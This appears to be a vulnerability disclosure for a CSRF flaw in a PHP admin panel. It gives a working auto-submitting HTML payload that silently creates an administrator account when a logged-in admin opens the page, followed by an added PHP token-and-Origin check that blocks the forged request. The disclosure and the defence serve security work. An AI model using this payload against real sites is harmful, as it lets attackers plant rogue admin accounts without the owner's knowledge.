Adding an admin interface exists CSRF exploit vulnerability #13

@PickledFish

After the administrator has logged in, open the following two pages:

Save in payload.html, add administrator:

```html
<title>Title</title>
<script type="text/javascript">
function post(url, fields) {
    var p = document.createElement("form");
    p.action = url;
    p.innerHTML = fields;
    p.target = "_self";
    p.method = "post";
    document.body.appendChild(p);
    p.submit();
}

function csrf_hack() {
    // Start from an empty string so the form markup is not prefixed with "undefined".
    var fields = "";

    fields += "<input type='hidden' name='username' value='hack123' />";
    fields += "<input type='hidden' name='password' value='hacktest' />";
    fields += "<input type='hidden' name='repassword' value='hacktest' />";
    var url = "http://127.0.0.1/admin.php?m=Member&a=adminaddsave";
    post(url, fields);
}

window.onload = function () {
    csrf_hack();
}
</script>
```
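A server-side check that would reject the request sent by payload.html, as an added example that is not part of the original issue or the project's own code. The helper names `csrf_token` and `csrf_request_ok`, the `csrf_token` field name and the sample requests are assumptions constructed for illustration.

```php
<?php
// Added example: hypothetical helpers, not the project's own code.
declare(strict_types=1);

/** Issue (or reuse) a per-session token to embed as a hidden field in the add-administrator form. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Accept only a POST that carries the session's token and, when sent, a same-origin Origin header. */
function csrf_request_ok(array $server, array $post, array $session, string $expectedOrigin): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    // Browsers attach Origin to cross-site form POSTs; a mismatch is rejected outright.
    if (isset($server['HTTP_ORIGIN']) && $server['HTTP_ORIGIN'] !== $expectedOrigin) {
        return false;
    }
    $sent  = $post['csrf_token'] ?? '';
    $known = $session['csrf_token'] ?? '';
    // Constant-time comparison; an empty session token never matches.
    return is_string($sent) && is_string($known) && $known !== '' && hash_equals($known, $sent);
}

// Constructed requests modelled on the fields posted to adminaddsave.
$session = [];
$token   = csrf_token($session);
$origin  = 'http://127.0.0.1';
$fields  = ['username' => 'hack123', 'password' => 'hacktest', 'repassword' => 'hacktest'];

$crossSite = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://attacker.example'];
$sameSite  = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => $origin];

// Cross-site form without a token, same-origin POST without a token, then the genuine form.
var_dump(csrf_request_ok($crossSite, $fields, $session, $origin));
var_dump(csrf_request_ok($sameSite, $fields, $session, $origin));
var_dump(csrf_request_ok($sameSite, $fields + ['csrf_token' => $token], $session, $origin));
```

Only the last call passes, because the forged form has no way to read the token stored in the administrator's session.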
